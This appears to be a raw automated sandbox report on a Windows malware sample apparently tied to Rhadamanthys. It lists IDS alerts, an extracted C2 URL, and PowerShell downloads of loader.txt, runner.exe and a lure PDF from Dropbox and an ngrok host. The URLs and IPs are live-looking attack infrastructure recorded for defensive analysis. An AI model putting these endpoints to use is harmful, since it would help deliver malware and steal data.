Source:	Binary string: wntdll.pdbUGP source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2365289877.00000000053B0000.00000004.00000001.00020000.00000000.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2365513945.0000000005550000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2369734266.0000000005690000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2364591216.00000000053B0000.00000004.00000001.00020000.00000000.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2364834495.00000000055A0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2369002536.0000000005690000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2365289877.00000000053B0000.00000004.00000001.00020000.00000000.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2365513945.0000000005550000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2369734266.0000000005690000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: softy.pdbvice source: powershell.exe, 0000000F.00000002.2293605870.000001CA22E80000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbE source: powershell.exe, 0000000F.00000002.2296940479.000001D224642000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbw source: powershell.exe, 0000000F.00000002.2296993036.000001D22464D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2365946962.00000000054D0000.00000004.00000001.00020000.00000000.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2365827330.00000000053B0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2370563632.0000000003A00000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2366306467.00000000053B0000.00000004.00000001.00020000.00000000.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000003.2366537028.00000000055D0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2371047023.0000000005690000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001D.00000003.2371296262.00000000058B0000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Windows\System32\fontdrvhost.exe

Code function: 4x nop then dec esp

34_2_000001ACA8CC0511

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 104.161.43.18:2845 -> 192.168.2.8:49839

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://104.161.43.18:2845/7e56fc199c7194d0/qc1o4gn8.mjfvk

Source: global traffic

TCP traffic: 192.168.2.8:49839 -> 104.161.43.18:2845

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

HTTP traffic: Redirect from: www.dropbox.com to https://uc5c65c43ad4aba7cc9431e0b8f6.dl.dropboxusercontent.com/cd/0/get/cgznsgbw6ffgpnuzxfw6lsljzsqkq1b2l3dxrurmiuv6zejyvueugrgrjzxbtn9caq0rnzwpusua--sgxpetnenninmyrljmj3k26y2qxepbkmsylv1m_hszwrtcgrcp7o6a6ddeh_pg2sx5p4-den86/file?dl=1#

Source: Joe Sandbox View	IP Address: 162.125.65.18 162.125.65.18
Source: Joe Sandbox View	IP Address: 162.125.69.15 162.125.69.15
Source: Joe Sandbox View	IP Address: 162.159.61.3 162.159.61.3

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49711 -> 162.125.65.18:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49771 -> 162.125.65.18:443

Source: global traffic	HTTP traffic detected: GET /api/secure/3fee076f9528f690839c19be95e034f2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.appConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /scl/fi/76ojn2f5am0wg3ws7kh33/secure.txt?rlkey=yejog0bk51d3d9mvha5r8cczb&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cd/0/get/CgaRoAXn44inIZLi9RO1hk9dvZYwrO3q5ZpYmLnyDB28oFZGSxVrsZU5ZdI03PozFS6meOPOe27VeEOKA8TR_Cth4xi4gw3NsY_8w6WADmBoMW9wvrHJE_uFpbukqFVZ_4L1itIKAEAxwHbXhgKW4e26/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ucc92cc8797dce098717f308293f.dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /scl/fi/uan9gvebl6408bjvhbjdm/loader.txt?rlkey=k3wwqb6ysaho8yzi78guuwbl1&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
Source: global traffic	HTTP traffic detected: GET /cd/0/get/CgaKGF4DHA4178nUmndW2edv9zTcUoyufdh9M2yMgQh9ii-6pCJGjPyWnLNeEbb0k3AeS9Egp-h72GNAHpmZo471qKhxX_7Ioh3fqr9pZ0sbAiLI-biIqiNzCP4XwvJw-yFTOiiXqfMv0nKWye9FWFB0/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ucafc6786f84446e8965e5916cb2.dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 HTTP/1.1Host: www.dropbox.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /cd/0/get/CgZNsgbW6ffgpNuZxFw6lsljZsQkq1b2l3dXRUrmiUV6ZejyVueUgRgRJzXBTN9CAq0rnzwPuSuA--sgXpeTNeNnINmYrLJMJ3K26Y2QXEpBkmsYLv1m_hSzwrTcGrcp7O6a6dDEh_Pg2Sx5P4-DEN86/file?dl=1 HTTP/1.1Host: uc5c65c43ad4aba7cc9431e0b8f6.dl.dropboxusercontent.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cd/0/get/CgZSpmkgglMHW_xaaU7yqi82x2q8KwWyqvhs2o8ESVwD1ny7JJxD0tMY9BrM0z0sqHg6HP3PasiERBoNA2jjZX3zJgMydw3s0GEWJ8eHDZ7bmxtwZuwAHu2TbWyzA-06cb8fnjg4dg4184uHnGSAFbpz/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ucba4b1078bde293defc150c5894.dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
Source: global traffic	HTTP traffic detected: GET /cd/0/get/CgadaRKEOwA5MRXWVZEddfKXWjH49vGPTAekNX7Bpm--a51ygSd0CsbtwPHWRIXTK8-0SMPpL0xdj14LYOPhHdc7dfKCIAlM3qNNc5kiKML9oFhkYTsAOXAirCTSR12pCC7Hy1h-mMeoIsIpvfrIm5hF/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc60c26e4725b7ba7605f3b031bb.dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /metadata/3fee076f9528f690839c19be95e034f2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.appConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.40.161

Source: global traffic	HTTP traffic detected: GET /api/secure/3fee076f9528f690839c19be95e034f2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.appConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /scl/fi/76ojn2f5am0wg3ws7kh33/secure.txt?rlkey=yejog0bk51d3d9mvha5r8cczb&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cd/0/get/CgaRoAXn44inIZLi9RO1hk9dvZYwrO3q5ZpYmLnyDB28oFZGSxVrsZU5ZdI03PozFS6meOPOe27VeEOKA8TR_Cth4xi4gw3NsY_8w6WADmBoMW9wvrHJE_uFpbukqFVZ_4L1itIKAEAxwHbXhgKW4e26/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ucc92cc8797dce098717f308293f.dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /scl/fi/uan9gvebl6408bjvhbjdm/loader.txt?rlkey=k3wwqb6ysaho8yzi78guuwbl1&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
Source: global traffic	HTTP traffic detected: GET /cd/0/get/CgaKGF4DHA4178nUmndW2edv9zTcUoyufdh9M2yMgQh9ii-6pCJGjPyWnLNeEbb0k3AeS9Egp-h72GNAHpmZo471qKhxX_7Ioh3fqr9pZ0sbAiLI-biIqiNzCP4XwvJw-yFTOiiXqfMv0nKWye9FWFB0/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ucafc6786f84446e8965e5916cb2.dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 HTTP/1.1Host: www.dropbox.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /cd/0/get/CgZNsgbW6ffgpNuZxFw6lsljZsQkq1b2l3dXRUrmiUV6ZejyVueUgRgRJzXBTN9CAq0rnzwPuSuA--sgXpeTNeNnINmYrLJMJ3K26Y2QXEpBkmsYLv1m_hSzwrTcGrcp7O6a6dDEh_Pg2Sx5P4-DEN86/file?dl=1 HTTP/1.1Host: uc5c65c43ad4aba7cc9431e0b8f6.dl.dropboxusercontent.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cd/0/get/CgZSpmkgglMHW_xaaU7yqi82x2q8KwWyqvhs2o8ESVwD1ny7JJxD0tMY9BrM0z0sqHg6HP3PasiERBoNA2jjZX3zJgMydw3s0GEWJ8eHDZ7bmxtwZuwAHu2TbWyzA-06cb8fnjg4dg4184uHnGSAFbpz/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ucba4b1078bde293defc150c5894.dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
Source: global traffic	HTTP traffic detected: GET /cd/0/get/CgadaRKEOwA5MRXWVZEddfKXWjH49vGPTAekNX7Bpm--a51ygSd0CsbtwPHWRIXTK8-0SMPpL0xdj14LYOPhHdc7dfKCIAlM3qNNc5kiKML9oFhkYTsAOXAirCTSR12pCC7Hy1h-mMeoIsIpvfrIm5hF/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc60c26e4725b7ba7605f3b031bb.dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /metadata/3fee076f9528f690839c19be95e034f2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.appConnection: Keep-Alive

Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Policy: child-src https://www.dropbox.com/static/serviceworker/ blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; style-src https:// 'unsafe-inline' 'unsafe-eval' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-src https:// carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; img-src https://* data: blob: ; frame-ancestors 'self' https://.dropbox.com ; font-src https:// data: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' equals www.yahoo.com (Yahoo)
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: child-src https://www.dropbox.com/static/serviceworker/ blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; style-src https:// 'unsafe-inline' 'unsafe-eval' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-src https:// carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; img-src https://* data: blob: ; frame-ancestors 'self' https://.dropbox.com ; font-src https:// data: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' equals www.yahoo.com (Yahoo)
Source: powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: img-src https://* data: blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; media-src https://* blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; frame-ancestors 'self' https://.dropbox.com ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; base-uri 'self' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ 